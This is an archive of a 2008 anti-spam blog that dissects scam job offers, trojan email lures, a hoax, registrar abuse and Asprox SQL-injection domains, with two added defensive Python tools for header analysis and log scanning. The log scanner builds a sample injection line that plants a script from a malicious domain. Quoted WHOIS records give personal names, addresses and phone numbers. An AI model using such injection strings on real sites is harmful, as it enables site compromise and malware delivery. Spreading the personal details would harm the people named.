Wednesday, 5 November 2008

"App LLC Group." scam

Another ridiculously worded scam job offer, essentially identical to this one.

Subject: How for short time to earn $1200 in a week? Read!
"Sucky sucky long time five dollar" to you too.

HELLO EVERYONE!
Woot!


Please take your time and read about this genuine offer, job position.Make money
spending only few hours a day, if you are located in Australia! This position either
can replace your current job, or can be as an extra income for you. Denmark
successful company - Apple Sales Group brought this opportunity for you.
Advertisement itself is brought to you via Google ads (Paid advertisement, assigning
e-mail business account). The most convenient and smart position for anybody who has
couple hours a day, Monday-Friday. You will be able to make 1400+ AUD a week! It's
either - you do want to participate in this, or - you do not, that's what makes it a
genuine offer and worth reading and finding out more. If you meet requirements - do
not hesitate to receive full information:
1400 AUD? You said $1200 a moment ago. Are we talking US$ or AU$? At least I know it's "Genuine" because you said so twice. Shame about the really bad English, all the Danish people I know speak English very well.

*You are 18+ y/o
*You are Reliable and Enthusiastic person.
*You Have 2-3 Hours a Day of Your Spare/Free Time, Monday-Friday(Saturday).
*You Are Located in United Kingdom/Ireland.
*You Have Access to Internet 2-3 Hours A Day, Monday-Friday(Saturday).
Didn't you just say Australia? These are different countries, you know.

Reference:
"The Most Creative Opportunity of The Month" - "Two Time" Magazine, quote by Angela
Roer.
"Consider This Opportunity" - "Behind The Truth" Magazine, quote by Marcus Stowee.
"I can't believe I was so stupid" - "State Penitentiary newsletter", quote by hapless money mule victim.

To receive full information reply only to e-mail: apple.swed404@gmail.com
with subject "More Information" and one of our representatives will assist you
shortly.
Thank you for your interest and Good Luck!


Best Regards,
App LLC Group.
Apple.Swed404? Sweden? I thought you said you were based in Denmark? App LLC? That wasn't the company name you gave earlier.

Originating IP is 95.57.7.182 in Kazakhstan. That country has featured in these fake job offers before (here and here).

Tuesday, 4 November 2008

"Recovery KEYS for your account" trojan

Another day, another ZIP-in-EXE trojan with a lot of spaces in it.


Subject: Recovery KEYS for your account

Good afternoon, [victim]

There are the keys to recover your personal account. In order to use them later,
please, preserve them in a sure place.

Sincerely, Dick Riddle

Attachment: the_Keys.zip

The ZIP file contains an EXE that looks like a Word document, The_Keys.doc[88 spaces].exe. Worryingly, VirusTotal detects nothing at all. The trojan is clearly related to this one and this one.

Monday, 3 November 2008

"Colorado Business Bank - Network Security and Monitoring"


These banks get more obscure all the time, but still carry the same sort of malicious payload.



Subject: Colorado Business Bank - Network Security and Monitoring
From: "Colorado Business Bank Account Service" alert@cobizbank.com

COLORADO BUSINESS BANK NOTICE:

Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.
VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.

Proceed to customer service department>>

Sincerely, Everett Torres.
Copyright - Colorado Business Bank, a part of COBIZ BANK.



VirusTotal detections are the usual mixed bag. Most detections seem to be generic (e.g. W32/Packed_FSG.D, TR/Crypt.FSPM.Gen, Trojan.Win32.Packed.gen, TrojanDownloader:Win32/Suceret.gen!A).

Friday, 31 October 2008

Dating scams and 79.135.168.*

We've seen this type of dating scam several times before. No good will come of engaging "Chantel" in conversations as she doesn't really exist. It will be some fat sweaty Russian bloke probably.

Subject: hi from chantel

hello, I am pretty russian girl, bored tonight.
would you like to chat with me and see my pics?
if so then email me at echantel39@officialsup.com
This is hosted on 79.135.168.36 which has been fingered before for fraud. Allegedly, the netblock is registered to an outfit in the Lebanon:


inetnum: 79.135.168.0 - 79.135.168.255
netname: LB-NET
descr: Lebanon private dedicated service
country: LB
admin-c: MHB1111-RIPE
tech-c: MHB1111-RIPE
remarks: abuse mailbox: moh.b@lubnannetworks.biz
status: ASSIGNED PA
mnt-by: SISTEM-NET-MNT
source: RIPE # Filtered

person: Mohamed Baga
address: Basha Garden bldg, 5th floor LB
address: Jisr El Bacha Main Road
address: Beirut - Lebanon
e-mail: moh.b@lubnannetworks.biz
remarks: abuse mailbox: moh.b@lubnannetworks.biz
phone: +961 1 512341
nic-hdl: MHB1111-RIPE
source: RIPE # Filtered

% Information related to '79.135.160.0/19AS44097'

route: 79.135.160.0/19
descr: Sistemnet Telecom
origin: AS44097
mnt-by: Sistem-Net-MNT
But just a few IP addresses away is another netblock that we have seen before in Turkey. The whole netblock is a complete sewer and is listed on the Spamhaus DROP List. There are 2000+ domains in this /24 block, but just for brevity I will list the ones on this server - avoid them all.

Nameservers are NS1.DROREAL.COM and NS2.DROREAL.COM, both on 79.135.168.36.

Thursday, 30 October 2008

"Apollo Business Services" / scam job offer


Spammers are stupid. This job offer scam combines two different offers, both of which are fraudulent. Part one is for "Apollo Business Services". Check out the very strange disclaimer on the bottom.




Subject: job offer for you. thanks
From: "Worldmarkettusew" worldmarkettusew@gmail.com

Apollo Business Services part-time opportunity (40/hr)
Dear ,

Apollo Business Services company was established in 2004 by an international team
of financial and marketing experts. We specialize in delivering positive business
results through solving currency exchange problem as well as online payments and
transactions, their tools being innovative solutions, high performance and e-commerce
optimization techniques.

We offer a "work at home" part-time position "Regional Manager". This includes
processing payments between our partners' clients and our company, ensure all personal
data relating to customers is maintained, accurate and kept discreet, identifying
opportunities to improve service delivery.

Position Type: Permanent.
Working hours: 9:00AM - 1:00PM weekdays. Variable overtime is also required.
Occupation Type: part-time (1-5 hours a day occupation).
Salary: $40 per hour.

Professional qualities and skills:

* Scrupulous and diligent;
* Computer literate;
* Good organizational and administrative skills;
* Payment procedures prior experience would be an asset;
* Ability to work independently.

Please REPLY to this e-mail to receive further information and application forms.

Yours sincerely,

Robert Hughley,
HR Manager,
Apollo Business Services
You are receiving this employment opportunity email because you uploaded your resume on CareerBuilder. This email is used for hiring process only to prevent the company from spam messages.
If your employment status has changed or you no longer wish to receive these emails, you can update your privacy and communication preferences from your resume by logging onto CareerBuilder.com:
http://www.careerbuilder.com/jobseeker/emails/emailsubcenter.aspx

Or you can Block this employer from viewing your resume and sending you candidate emails.

This email was sent from Account ID ATXNC91MZIFSAQTSAC7 and by this logged in User U48VA7D999LFKCKNSYZ
DISCLAIMER
The content of this email has been reviewed and approved by CareerBuilder. This email is intended for the use of the individual address named above and may contain information that is confidential, privileged or unsuitable for overly sensitive persons with low self-esteem, no sense of humour or irrational religious beliefs. If you are not the intended recipient, any dissemination, distribution or copying of this email is not authorised and constitutes an irritating social faux pas.



Bizarrely, attached to this spam are five other attachments trying to punt a different scam:




Dear sir or madam,
My name is Jackie Simons, I am an Advertising Manager at SocMart (www.socmart.com.ua).
The company’s principal activity is investment in residential property of developing
countries.
Our chief objective is to attract foreign investors to the affobadle housing market
of Belorussia,
Russia, Ukraine, Kazakhstan and etc. The housing prices are often high in these
countries and tend to
continuously increase, whereas the quality of the property remains rather low. As
far as we are eager to change the
situation, our company is now focused on attaraction of potential foreign investors
to the available property market
of the former CIS countries. Our three-year experience in the property investment
market has revealed an excessive number
of people willing to invest their funds into developing countries’ residential
property. However, we came across a problem
concerned with bureaucracy, as banking systems of the former CIS countries are
still undeveloped for prompt and effective
international bank transfer service. Lack of proper relations between Western and
Eastern banking systems dealing with
international bank transfer service does not allow us to process promptly our
foreign customers’ investments
(investments are to be on hold during 1-2 months). The fact that property prices are
continuously flactuating has made
it clear that efficiency in investment processing is our priority. Considering the
above we had to recourse to “investment managers”
to accelerate investment processing to the maximum extend. In case you got
interested with our proposal do not hesitate to contact us by e-mail:
worldmarkettusel@gmail.com



SocMart is a wholly legitimate Ukrainian firm dealing in real estate who are NOT responsible for this spam. Whichever version of this you get, avoid it like the plague.

Added: the following email addresses are being used for this, and probably others:
worldmarkettusef@gmail.com
worldmarkettuse@gmail.com
worldmarkettusel@gmail.com
worldmarkettusew@gmail.com
worldmarkettusey@gmail.com

"Auction Sales Online" job scam

It isn't always clear what the scam is with these fake job offers, but it seems that fraudsters need to recruit a large number of patsies to run their operation. In fact, there is quite a large bogus career network going on here, with "employees" traded between various underground enterprises.



Subject: Working Part Time

Auction Sales Online is currently hiring for work at home positions,
in the United Kingdom, part-time and full-time available. The positions
focus on providing administrative assistance in online sales.

Auction Sales Online provides business support, retail distribution,
franchise operations, direct sales, and a variety of auction as well
as accounting and billing services.

Salary:

Part-time: 1,100GBP/month plus commission
Full-time: 2,200GBP/month plus commission

Professional Qualities:

- Customer focused decision maker
- Demonstrates a high level of personal accountability
- Thinks about the team first over personal agendas
- Excellent communication skills

Basic Requirements:

- Internet Access
- Microsoft Office
- Basic Accounting skills

If you are interested in this position please send us an email to
Tracy.Miller@aso-careers.com expressing your interest and we will
forward you the detailed job description and the agreement.

Best regards,
ASO Team





This particular job scam references the domain aso-careers.com which has been registered for this purpose. The WHOIS records are almost definitely fake, registered through BIZCN.COM, INC.:

Domain name: aso-careers.com

Registrant Contact:
Sam Lloyd
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

Administrative Contact:
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

Technical Contact:
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

Billing Contact:
Sam Lloyd supportnewest@safe-mail.net
+1.8827729829 fax: +1.8827729829
81313 po box
New York NY 10016
us

DNS:
ns1.floodinger.com
ns2.floodinger.com

Created: 2008-10-27
Expires: 2009-10-27
floodinger.com is a new one, but the registration details are hidden. ns1.floodinger.com is 67.202.88.243 in the US and 21.214.23.151 which apparently belongs to the Department of Defense (!).

Mail is handled by 12.192.82.225 which we have seen twice before. The Silent Noise blog fingers that as part of the Asprox network. Asprox involvement is hardly news - it's an impressively large underground organisation (presumably with its own underground lair).. although it is quite possible that Asprox facilities are being used on behalf of a client.

Anyway, avoid unsolicited job offers, and always ask for some real, verifiable contact details. In the UK you can check details at Companies House. For US companies, the state Division of Corporations should have company details, or you can perhaps check at the BBB.

Estdomains is not dead yet



Thanks to Sandi for bringing the not-so-good-news that Estdomains is not quite dead yet. For a moment it looked like ICANN had grown some cojones, but perhaps not.

Estdomains' termination was based on the fact that their President, Vladimir Tsastsin, has been convicted of fraud in Estonia. However, Estdomains are attempting to wriggle out of this by saying that Tsastsin didn't do it and he resigned as president some time ago. Bearing in mind that an Estonian court said he DID do it (although he is appealing, but that could take for ever) and that the only proof offered by Estdomains that he resigned looks a bit unconvincing, the whole excuse looks rather thin.

Of course, the reason why Estdomains should be terminated is their long-running association with organised crime, as documented here and here. Add to that the fact that the company deliberately conceals its identity by using a Delaware corporation as a front (when obviously "Est" is for Estonia), and it is clear that they should have been terminated a long, long time ago.

Wednesday, 29 October 2008

Persimmon Homes / Marks & Spencers Vouchers Hoax

There is currently a hoax email circulating similar to the following:

Thought this might be useful with Christmas coming up

Marks & Spencer, in conjunction with Persimmon Homes, are giving away free vouchers. Marks & Spencer's are trying word-of-mouth advertising to introduce its products and the reward you receive for advertising for them is free non-refundable vouchers to be used in any M & S store.

To receive your free vouchers by e-mail all you have to do is send this e-mail out to 8 people (for £100 of free vouchers) or 20 people (for £500 of free vouchers). Within 2 weeks you will receive an e-mail with your vouchers attached. They will contact you through your e-mail address.

NB. Please mark a copy to:
Andy.curran@persimmonshomes.com
As it happens, the domain name persimmonshomes.com is incorrect, it would be persimmonhomes.com. But no matter, Persimmon categorically deny that it is anything to do with them:

"Hoax E-mail"

A hoax e-mail is being circulated offering a promotion of free Marks and Spencer vouchers for forwarding the e-mail to colleagues and friends.

Neither Marks and Spencer or Persimmon Homes have made any such promotional offer.

Please delete the hoax e-mail and notify the people to whom you have sent it that it is a hoax.
It turns out that this hoax has been doing the rounds since 2007. There's also an interesting thread about it here.

You can also check out Dynamoo's Email Etiquette page for some advice on what is appropriate to forward and what isn't.

Estdomains is dead


Good riddance to bad rubbish - Estdomains has been de-accredited by ICANN, although it took long enough. If you're a registrar who wants to take on some of the most toxic domain names in the business, then ICANN invites you to apply for them.

More details here. Thanks to Spyware Sucks for the heads-up.

Alex Shafts, CEO / World Wide Domain Names Part II

Yesterday's "Alex Shafts" spam run is the most bizarre I have seen in a long time, and clearly has been quite widespread given the hundreds of visitors who have come to this blog.
  1. Spammer appears to have lost his home, so presumably is in financial trouble. That sucks, times are certainly hard for a lot of people.. often through no fault of their own.
  2. Spammer discovers affiliate marketing. Done right, this can make you a lot of money.. assuming that you do it right.
  3. Spammer decides that LunarPages web hosting affiliate program looks good.
  4. Spammer rents a server, a mailing list and writes some ad copy. I can quite believe that the spammer bought the mailing list in good faith - often scraped email addresses are mis-sold as opt-in addresses.
  5. Now things start to go awry - the spammer's email is not CAN-SPAM compliant. The subject line is deceptive (it is "Notice Regarding Your DOMAIN NAME", the spam is about hosting). There is no physical address on the email, and no opt-out mechanism.
  6. On the plus side, the spammer is not hiding his identity, and the spamvertised domain of worldswidedomainname.com has what appears to be vaguely valid contact details (although the house currently appears to be empty).
  7. Now for the REALLY stupid part - the spammer has set up a mailing list to distribute the spam, but there are no restrictions on who can send to it. So when some addresses start to auto-respond, those responses are then re-spammed out to everyone on the list. I have seen dozens of these, but I think that my spam filter has kept out a LOT more.
  8. Spammer's affiliate account, hosting and even Yahoo! email address gets nuked from orbit. Kudos to LunarPages and IX Web Hosting for their prompt action.
  9. Who knows what will happen next? A LOT of people are really angry about the email storm that this has generated. Some may even take legal action.
There's another interesting blog entry about this at Skillett.com which expands on the story some.

So here's the scorecard for this particular bit of affiliate marketing:

  • Keeping within the Terms of Service for your affiliate program: FAIL
  • Keeping within the Terms of Service for your web host: FAIL
  • Technical expertise: FAIL
  • Legal compliance: FAIL
  • Income generation: FAIL
  • OVERALL: FAIL
Now if only Ecommerce corporation could shut down the spam coming through 98.130.1.155 then everyone else would have a WIN. As of about 0500 GMT the darned stuff is still coming through..

Tuesday, 28 October 2008

Alex Shafts, CEO / World Wide Domain Names / LunarPages spam

There's more to this spam than meets the eye.. and be certain that it IS spam and isn't any kind of communication from your domain name registrar:



Subject: Notice Regarding Your DOMAIN NAME
From: "Domain Name Support"
Date: Tue, October 28, 2008 5:16 am
To: info@worldswidedomainname.com


*****************************************
Important Notice Regarding Your Domain Name(s)
*****************************************

Dear Webmaster,

According to our records you are the ADMINISTRATIVE CONTACT.

We would like to inform you we have partnered up with LunarPages Web Hosting. We understand you are currently hosting with another provider. But we encourage you to try out LunarPages. LunarPages also has an affiliation program where you can embed banners on your website and earn $65 for every referral.

A little more information about LunarPages; Lunarpages Web Hosting was born from Add2Net in 2000, and has grown rapidly providing Shared Hosting, Dedicated, Reseller, and most recently, VPS Hosting Plans. LunarPages is BBB Accredited and is rated A for excellence. LunarPages also has received many Industry Awards including Web Host Magazines highest level of recommendation. LunarPages is one of the fewest hosting services that provide unlimited transfer and unlimited data storage.

LunarPages can fit your business needs whether you’re a small business or a large company. Join (or lurk about) Community Forums and ask our customers why they host with LunarPages. For more in depth information, news and articles about Web Hosting, Marketing, SEO, Traffic, AdWords, Design, Networking and General Fluff, visit Lunartics Blog (updated daily, sometimes hourly). Our BlogStars consist of a team of more than 20+ industry experts. You may learn something, or simply be entertained.

VISIT LUNARPAGES

If you’re not ready to give LunarPages “Web Hosting” a try just yet, TRY the affiliation program where you can earn hundreds or even thousands a month. Save this email for your records and click the link above for special promos throughout the year.

Best Regards,

Alex Shafts, CEO

World Wide Domain Names

If you are the domain administrator of more than one domain account, you may receive this notice multiple times.
-------------------------------------------------------------------

All rights reserved.



Who the heck is Alex Shafts? And who are "World Wide Domain Names"? Certainly nobody I do business with. So let's see who is sending this first of all. A look at the mail headers will be interesting:

X-Spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on blade2.cesmail.net
X-Spam-Level:
X-Spam-Status: hits=0.9 tests=HTML_MESSAGE,URIBL_RHS_DOB version=3.2.4
Received: from unknown (192.168.1.88)
by blade2.cesmail.net with QMQP; 28 Oct 2008 05:27:00 -0000
Received: from mail500.opentransfer.com (98.130.1.155)
by ********** with SMTP; 28 Oct 2008 05:27:04 -0000
Received: (qmail 624 invoked by uid 399); 28 Oct 2008 05:16:47 -0000
Mailing-List: contact info-help@worldswidedomainname.com; run by ezmlm
Precedence: bulk
X-No-Archive: yes
List-Post:
List-Help:
List-Unsubscribe:
List-Subscribe:
Delivered-To: mailing list info@worldswidedomainname.com
Received: (qmail 618 invoked by uid 399); 28 Oct 2008 05:16:47 -0000
X-Originating-IP: 68.230.241.45
Received-SPF: none (mail500.opentransfer.com: domain at worldswidedomainname.com does not designate permitted sender hosts)
identity=mailfrom; client-ip=68.230.241.45;
envelope-from=;
X-Authority-Analysis: v=1.0 c=1 a=J2IRbVyBMHeSdsxzcmgA:9
a=21DexejRGg20G2OFDxsA:7 a=V6NLHKsM1nmveCJf-9nhvT6W67oA:4 a=htsp1cwEuSoA:10
a=6-9Fr_h7AAAA:8 a=Vm2oXCpbAAAA:8 a=n4JkmEeXAAAA:8 a=W_LaJHSTY1FKiyaM68cA:9
a=aa2LJqmKak3HsCtWz3EA:7 a=2hL6MRTsiU3c-Xv2ucuIwzcZna0A:4 a=ojskhZjZVJUA:10
a=pM-imOxlMqoA:10 a=fd-QgsGfzTIA:10 a=AfD3MYMu9mQA:10
X-CM-Score: 0.00
Message-ID: <802858ce0ad3496e988f0c3c39bc0060@alex>
From: "Domain Name Support"
To:
Subject: Notice Regarding Your DOMAIN NAME
Date: Tue, 28 Oct 2008 01:16:39 -0400
The originating IP address is 68.230.241.45 which is Cox Communications.. but we also have a domain name of worldswidedomainname.com. The WHOIS details for that domain match the sender's name:

Registrant:
Alex Shafts
504 LEONARD AV
Las Vegas, NV 89106
US

Domain name: WORLDSWIDEDOMAINNAME.COM

Administrative Contact:
Shafts, Alex worldsdomainnames@yahoo.com
504 LEONARD AV
Las Vegas, NV 89106
US
702.5431469
Technical Contact:
Shafts, Alex worldsdomainnames@yahoo.com
504 LEONARD AV
Las Vegas, NV 89106
US
702.5431469

Registrar of Record: TUCOWS, INC.
Record last updated on 24-Oct-2008.
Record expires on 25-Oct-2009.
Record created on 25-Oct-2008.
This domain is just a couple of days old which sets the alarm bells ringing. A Google search for "504 Leonard Av" comes up with a couple of YouTube videos [1, 2]. It turns out to be a foreclosure sale. OK, that really sucks for Mr Shafts but it is no excuse to send out spam.
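The header walk-through above (Received chain, X-Originating-IP, the Received-SPF "none", the ezmlm list headers) is the kind of check worth automating. As an added example that is not from the original post, the following Python takes the header block quoted above (a subset, with its continuation lines re-indented as RFC 5322 folding requires, since the extraction flattened them) and pulls out the originating IP, the relay IPs, the SPF verdict and whether the message went out via a bulk mailing list. Standard library only.

```python
"""Read the delivery chain and authentication hints out of raw mail headers.

Added example, not part of the original post. HEADERS is a subset of the
header block quoted in the post, re-folded so the standard parser accepts it.
"""
import re
from email.parser import HeaderParser
from typing import Optional

HEADERS = """\
Received: from unknown (192.168.1.88)
  by blade2.cesmail.net with QMQP; 28 Oct 2008 05:27:00 -0000
Received: from mail500.opentransfer.com (98.130.1.155)
  by ********** with SMTP; 28 Oct 2008 05:27:04 -0000
Received: (qmail 624 invoked by uid 399); 28 Oct 2008 05:16:47 -0000
Mailing-List: contact info-help@worldswidedomainname.com; run by ezmlm
Precedence: bulk
Delivered-To: mailing list info@worldswidedomainname.com
Received: (qmail 618 invoked by uid 399); 28 Oct 2008 05:16:47 -0000
X-Originating-IP: 68.230.241.45
Received-SPF: none (mail500.opentransfer.com: domain at worldswidedomainname.com does not designate permitted sender hosts)
  identity=mailfrom; client-ip=68.230.241.45;
From: "Domain Name Support"
Subject: Notice Regarding Your DOMAIN NAME
Date: Tue, 28 Oct 2008 01:16:39 -0400

"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# "from <host> (<comment>)" at the start of a Received: header; the comment
# usually carries the connecting IP.
FROM_CLAUSE = re.compile(r"from (\S+)\s*(?:\(([^)]*)\))?")


def parse(raw: str):
    """Parse a blank-line-terminated header block into an email.message.Message."""
    return HeaderParser().parsestr(raw)


def received_chain(msg) -> list:
    """Received: hops oldest-first. Each hop records the 'from' host and the IP
    in the following parenthesis; local queue entries (qmail) have neither."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        text = " ".join(hdr.split())                 # unfold continuation lines
        m = FROM_CLAUSE.match(text)
        ip = IPV4.search(m.group(2) or "") if m else None
        hops.append({"from_host": m.group(1) if m else None,
                     "from_ip": ip.group() if ip else None})
    return hops


def spf_result(msg) -> Optional[str]:
    """First token of Received-SPF: pass, fail, softfail, neutral, none, ..."""
    spf = msg.get("Received-SPF")
    return spf.split()[0].lower() if spf else None


def originating_ip(msg) -> Optional[str]:
    """X-Originating-IP when the submitting server recorded one, otherwise the
    'from' IP of the oldest hop that has one."""
    xo = msg.get("X-Originating-IP")
    if xo:
        m = IPV4.search(xo)
        if m:
            return m.group()
    for hop in received_chain(msg):
        if hop["from_ip"]:
            return hop["from_ip"]
    return None


def assess(raw: str) -> dict:
    """Summarise the signals a reader would check before trusting the message."""
    msg = parse(raw)
    spf = spf_result(msg)
    return {
        "originating_ip": originating_ip(msg),
        "relay_ips": [h["from_ip"] for h in received_chain(msg) if h["from_ip"]],
        "spf": spf,
        "spf_ok": spf == "pass",
        # ezmlm adds Mailing-List:, and bulk precedence marks list traffic.
        "bulk_list_mail": msg.get("Precedence", "").lower() == "bulk"
                          or "Mailing-List" in msg,
        "from": msg.get("From"),
    }


if __name__ == "__main__":
    for key, value in assess(HEADERS).items():
        print(f"{key}: {value}")
```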

So, what is this spam trying to get you to do? Is it important? Nope. It's actually just spam for the LunarPages affiliate program. Web hosting affiliate programs can be big earners - in this case LunarPages pay $65 per sign-up. Not bad, but all this email is trying to do is get you to sign up for web hosting. It is in no way an official notice from your registrar.

We know that desperate situations lead to desperate actions, but sending out spam and what is basically deceptive advertising is not going to help.

Added: just to prove himself a bigger idiot, the mailing list that he created to send out the spam ALSO accepts email from absolutely anyone so now there's a real shitstorm of comments, autoreplies and bouncebacks. What a plonker.

Added: check out the comments to this post, also this blog entry has more details. I have made a follow-up entry here explaining the problem in more detail.

Friday, 24 October 2008

"Ferrasano Ferrosan" scam email

Another scam job offer, this time it looks like money laundering. The email is perhaps unintentionally funny, and has a few new social engineering twists.

Subject: Internet Brings a Job Position that Changes Peoples Lives!
Err yeah, money laundering can lead to a prison sentence for the hapless money mule.
Greetings to Everyone in UK! You Have a Lifetime Opportunity to Start making up to 700 GBP per Week, Getting Paid Daily!
Wow.. *everyone* in the UK? That's some spam run.

Successful company from Norway - Ferrasano Ferrosan Group, Offers an Outstanding Job Position!
Googling for "Ferrasano Ferrosan" brought up exactly zero hits.. except for this post in a few minutes (probably).
This Is a Real Genuine Offer That You've Never Seen before, that Gives You Financial Freedom.
Of course, it isn't a "real genuine offer" at all. It's a scam.

Please Take Couple Minutes to Discover This Amazing Opportunity That Will Change Your Life.
But not change it in a GOOD way.

You Are Being Offered an Outstanding Job Position Called "Fund Operator"!
i.e. a money mule.
Here are Few Requirements Before You Apply:

1. This Offer is for United Kingdom/Great Britain Only.
2. You Have to Have 2-3 hours of spare Time Monday-Friday.
3. You Have to be Enthusiastic About It and Be Able to Provide Us With Best Service.
4. No Past Experience Required/ No School Degree Required!
5. Be Able to Check E-mail 4-5 Times a Day and Stay in Touch With us Throughout the Day if Possible!
6. You need to be gullible.
Company Itself is Based in Norway, although Ferrosan is a worldwide health center that Distributes Businesses All Over the World and We Represent
our Norway Location, Fairly Young, but Successful Organization. With the Help of
Google Advertisements it Was Possible to Deliver This Message to You! Nowadays Internet Makes it Possible for Us to Interact on a Whole New Level.
Ferrosan is a genuine company, but it is based in Denmark. It was founded in 1919. "Google Advertisements"? This must be the upcoming "Google Spam (beta)" then.

Full Information About Position Will be Given in Full Package that You Can Request by E-mail, See Below How to Request Full Package.
I'll give that a miss, thanks.

Some References about Position:

Jeff Sparks states in "In Touch Weekly" magazine: "..Great Britain discovers great
opportunity from FF Group.."

Linda Abramke states in "Forbes" magazine: "..Internet simplifies communication and provides more opportunities..", talking about our job position.

Melissa Richardson states in "Cosmopolitan" magazine: "..New opportunity for single moms or students..", talking about simplicity and reliability of position.
These are all completely fake, of course, it's just another piece of social engineering. Sometimes 419 fraudsters use references on CNN or the BBC to try to add credibility.

You Will be able to Start Working with Us within 24 hours After You Apply and be
able to Start Making Money Immediately! Anybody can Do It, so Don't Hesitate
and Feel Free to Request Full Information, as It will Change Your Life, you will not
Have to Worry About Finances Anymore!
That "change your life" thing again...

Asprox: 47mode.name, berjke.ru, 81dns.ru

There has been a shift overnight in the domains used in the Asprox SQL injection attack, the ones to look for are:

  • 47mode.name
  • berjke.ru
  • 81dns.ru
Registration for the .ru domains looks like this:

domain: 81DNS.RU
type: CORPORATE
nserver: ns1.81dns.ru. 76.240.151.177
nserver: ns2.81dns.ru. 76.182.187.206
nserver: ns3.81dns.ru. 69.62.229.141
state: REGISTERED, DELEGATED
person: Private Person
phone: +3 212 7721130
fax-no: +3 212 7721130
e-mail: igorlsoloti@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.10.23
paid-till: 2009.10.23
source: TC-RIPN
47mode.name is different:

Registration Service Provided By: RESELL.BIZ
Contact: +1.3124476810
Website: http://Resell.biz

Domain Name: 47MODE.NAME

Registrant:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Creation Date: 21-Oct-2008
Expiration Date: 21-Oct-2009

Domain servers in listed order:
ns3.47mode.name
ns2.47mode.name
ns1.47mode.name

Administrative Contact:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Technical Contact:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Billing Contact:
Kimberly Maupin
Kimberly Maupin (pampaser@socialworker.net)
136 Lawndale Lane
Sneads Ferry
North Carolina,28640
US
Tel. +5.9103818739

Status:ACTIVE
It looks like "Kimberly Maupin" might well be a real person living in Sneads Ferry, whose identity has been "borrowed". However, the ZIP code is incorrect and the telephone number appears to be in Bolivia.

Anyway, block these domains or check your logs for them.
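Checking logs for these three domains is harder than a plain text search, because SQL injection payloads arrive percent-encoded and the injected string is often wrapped in a hex literal. As an added example that is not from the original post, this Python scans constructed access-log lines for the domains listed above in their raw, percent-decoded and 0x-hex-decoded forms; the CAST(0x... AS VARCHAR) shape of the sample lines is an assumption about how such payloads show up in request logs, not something the post states.

```python
"""Scan web-server log lines for the Asprox domains named in this post.

Added example, not from the original post. LOG is constructed to resemble
access-log lines; the hex decoding covers VARCHAR (single-byte) and
NVARCHAR (UTF-16LE) literals, which is an assumption about payload encoding.
"""
import re
from urllib.parse import unquote

ASPROX_DOMAINS = ("47mode.name", "berjke.ru", "81dns.ru")   # from the post

# A 0x literal of at least 8 hex digits (shorter ones are mostly numbers).
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{8,})")


def _hex(s: str) -> str:
    """Hex-encode text the way a single-byte VARCHAR literal would carry it."""
    return s.encode("latin-1").hex()


# Constructed sample log lines: one benign request, one with the domain inside
# a hex literal, one plain mention, one with a UTF-16LE (NVARCHAR) literal.
LOG = [
    '10.0.0.5 - - [24/Oct/2008:03:12:01 +0000] "GET /page.asp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Oct/2008:03:12:07 +0000] "GET /page.asp?id=1;SET%20@S=CAST(0x'
    + _hex("<script src=http://81dns.ru/b.js></script>")
    + '%20AS%20VARCHAR(4000)) HTTP/1.1" 200 512',
    '10.0.0.7 - - [24/Oct/2008:03:13:40 +0000] "GET /news.asp?q=berjke.ru HTTP/1.1" 200 128',
    '10.0.0.9 - - [24/Oct/2008:03:15:02 +0000] "GET /page.asp?id=1;SET%20@S=CAST(0x'
    + "47mode.name".encode("utf-16-le").hex()
    + '%20AS%20NVARCHAR(4000)) HTTP/1.1" 500 0',
]


def decoded_views(line: str) -> list:
    """The raw line, its percent-decoded form, and every decoded 0x literal
    (both as single-byte text and with UTF-16LE NUL padding stripped)."""
    decoded = unquote(line)
    views = [line, decoded]
    for blob in HEX_LITERAL.findall(decoded):
        raw = bytes.fromhex(blob[: len(blob) // 2 * 2])   # drop a stray odd digit
        views.append(raw.decode("latin-1"))
        views.append(raw.replace(b"\x00", b"").decode("latin-1"))
    return views


def find_asprox(line: str) -> list:
    """Watch-list domains that appear in any view of the line, sorted."""
    hits = set()
    for view in decoded_views(line):
        low = view.lower()
        for domain in ASPROX_DOMAINS:
            if domain in low:
                hits.add(domain)
    return sorted(hits)


def scan(lines) -> list:
    """(1-based line number, matched domains) for every line that matches."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = find_asprox(line)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in scan(LOG):
        print(f"line {number}: {', '.join(hits)}")
```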

Thursday, 23 October 2008

MS08-067

Microsoft Security Bulletin MS08-067 – Critical: Vulnerability in Server Service Could Allow Remote Code Execution (958644)

Let's make it simple: PATCH NOW. Microsoft says that this can spread from machine to machine without authentication, and reliable exploit code is likely. This makes it the ideal security flaw to hook a worm onto, like Blaster or Sasser.

If you're a corporate user with a firewall DO NOT imagine that the firewall will offer you much in the way of protection. Eventually either a worm-infected laptop will be plugged into your internal network, or possibly an infected machine may breach the firewall when it connects through the VPN. If there is a widespread outbreak and you're not prepared, then shutting off your VPN may buy you some time.

"WorldPay CARD transaction Confirmation" / "Academic Resources Center Inc." trojan


This is a fake email message pretending to be from WorldPay relating to a payment to "Academic Resources Center Inc".

There's an attached ZIP file which contains an EXE designed to look like a DOC.. but oddly with an icon that looks like Excel. Of course, this is actually a nasty trojan rather than a real document.

